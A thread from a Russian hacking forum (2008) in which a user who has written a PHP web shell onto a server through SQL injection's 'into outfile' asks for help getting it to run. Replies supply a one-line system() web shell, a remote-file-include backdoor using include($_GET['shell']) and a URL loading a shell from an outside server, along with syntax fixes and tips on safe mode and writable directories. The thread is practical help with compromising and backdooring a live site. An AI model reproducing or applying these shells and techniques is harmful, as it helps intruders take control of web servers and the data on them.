Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   проблема с шеллом ! (https://forum.antichat.xyz/showthread.php?t=69641)

stigmatus 07.05.2008 03:15

проблема с шеллом !
 
загрузил шелл через " into outfile " простои типа :
PHP код:

 <? system($_GET['c']); ?>

но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

fly 07.05.2008 04:21

Сейф мод ON>?
WinOs>?
include заюзать>?

stigmatus 07.05.2008 13:02

Цитата:

Сообщение от fly
Сейф мод ON>?
WinOs>?
include заюзать>?


подскажи как ??? проверить Сейф мод ??
include заюзать ???

zythar 07.05.2008 14:05

пиши в РНР файле
PHP код:

if (isset($_GET['shell'])) {
include(
$_GET['shell'];


потом юзай так:
Код:

http://site/script.php?shell=http://server/shell.txt
юзай php.net

Ali_MiX 07.05.2008 14:15

а если так require_once(ROOT_DIR.'/shell.php');

stigmatus 07.05.2008 14:59

ставид вот ето :
Цитата:

<? if (isset($_GET['shell'])) { include($_GET['shell']; } ?>
получил ето :

Цитата:

Parse error: syntax error, unexpected ';' in /usr/local/apache2/htdocs/cache/information.php on line 1

Don1=2 07.05.2008 15:33

Цитата:

Сообщение от stigmatus
ставид вот ето :

получил ето :

<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
скобочку забыл ... учи пхп

zythar 07.05.2008 15:33

у тя скобки не хватает.
Код:

<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
Цитата:

а если так require_once(ROOT_DIR.'/shell.php');
это если шелл на серваке который ты взломал уже.

stigmatus 07.05.2008 18:21

Цитата:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1
чё делоть ??? ищё может чтото ?

_Pantera_ 07.05.2008 18:35

Цитата:

Сообщение от stigmatus
загрузил шелл через " into outfile " простои типа :
PHP код:

 <? system($_GET['c']); ?>

но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......


Время: 18:43